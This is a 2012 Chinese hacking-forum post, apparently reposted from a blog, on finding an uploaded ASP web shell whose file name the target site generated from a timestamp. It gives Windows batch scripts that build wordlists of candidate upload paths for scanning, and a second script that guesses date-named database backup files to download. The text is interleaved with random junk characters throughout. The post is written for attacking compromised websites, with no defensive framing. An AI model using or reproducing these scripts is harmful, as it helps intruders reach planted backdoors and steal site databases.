找回密码
 立即注册
查看: 2124|回复: 0
打印 上一主题 下一主题

针对上传木马找不到名字的解决办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 15:04:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天在一个人博客里面看到的,地址是:http://www.0xsec.com/?p=260
7 u$ n4 l% a# ~& z6 B. O' z: Q5 z% y4 I# L9 Z' G) p! Y0 N$ a/ C& s
感觉思路蛮好的,而且在t00ls也没有找到相关文章,我就转过来给大家瞧瞧!5 k. c2 m" P' o. D$ ?( H
" u- N3 \9 u+ a% V% G* m
——————————————————–9 h- u9 a9 S1 F# u+ I: _- k
有时 传了 木马上去后 直接是 xiaoma.asp
1 U" G# `- W& v! W: E 还有种 是按照时间生成名字如201103091**************.asp0 I5 o$ M( y" Y+ J3 j. a# W: t( q
下面这种如果又 没有回显的话 就可以做 个字典扫0 ?9 ^3 b, s1 n# M
生成字典
4 F7 e. @$ H+ v! M9 \: w0 p uploadfile/2011/1/1/2011012847000000.asp5 {! e) X* b6 q0 j4 @6 t
uploadfile/2011/1/1/2011012847000001.asp
( r8 i3 P" J4 K1 o' M7 ?+ K. U uploadfile/2011/1/1/2011012847000002.asp
# [% e6 n- D9 f- d& \( V uploadfile/2011/1/1/2011012847000003.asp; F7 J. V. z8 Q/ S9 F
uploadfile/2011/1/1/2011012847000004.asp' y, ~- O- k* i( t+ P( \5 i: W
——————————————————-
/ z6 f- B: q9 m. e' L: z; {7 }, X/ [ 建议只 生成 上传 那1分种左右 如果你电脑 与网站服务器时间差距太大 就 多做点& R- P: T0 y, p& W0 R0 Z1 F
@echo off$ `  ?: X. s, t# C7 ]1 i
for %%a in (2011012847) do (; V' [1 N" t, P! h
for %%o in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28) do (% r, J& L( M" E2 I0 I7 H: a
for %%b in (0 1 2 3 4 5 6 7 8 9) do (
# q7 n8 F2 T1 o6 B for %%c in (0 1 2 3 4 5 6 7 8 9) do (% v. a0 O$ |3 {( l. c
for %%d in (0 1 2 3 4 5 6 7 8 9) do (. r0 j, ]+ ~/ u+ v: J
for %%e in (0 1 2 3 4 5 6 7 8 9) do (% o, }: }/ z3 u0 C! i
for %%f in (0 1 2 3 4 5 6 7 8 9) do (. O  ?0 G- P2 k& I/ Y/ C  E& n
for %%g in (0 1 2 3 4 5 6 7 8 9) do (
6 v) T% I( l( O" E) d echo uploadfile/2011/1/%%o/%%a%%b%%c%%d%%e%%f%%g.asp >>data.log9 n( t, k1 u: m" U/ m4 u
))))))))2 c- G" {- ?+ v
代码 如上 自己修改即可。 便有了小马的路径。方法不错。值得欣赏。  y- H% w1 U) H! B& F+ U
由此思路修改可以针对数据库备份扫描。
4 S" l- x( ^4 t5 R- `4 ?+ ~ 恩不错,还可以写个时间备份数据库文件扫描' l4 [. B/ M1 F% ]* p6 p2 O
@echo off3 u1 Q. P' ~) z/ W- I2 u9 c
for %%a in (2007 2008 2009 2010) do (- Q  \' C# W6 T# b- T
for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do (
. }% R8 }  {& [) ] for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do (* c% }: s* J: Y' @! k
echo databackup/%%a-%%b-%%c.mdb >>data.log
$ X0 I4 r0 p/ z2 E% O5 X) k )))
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表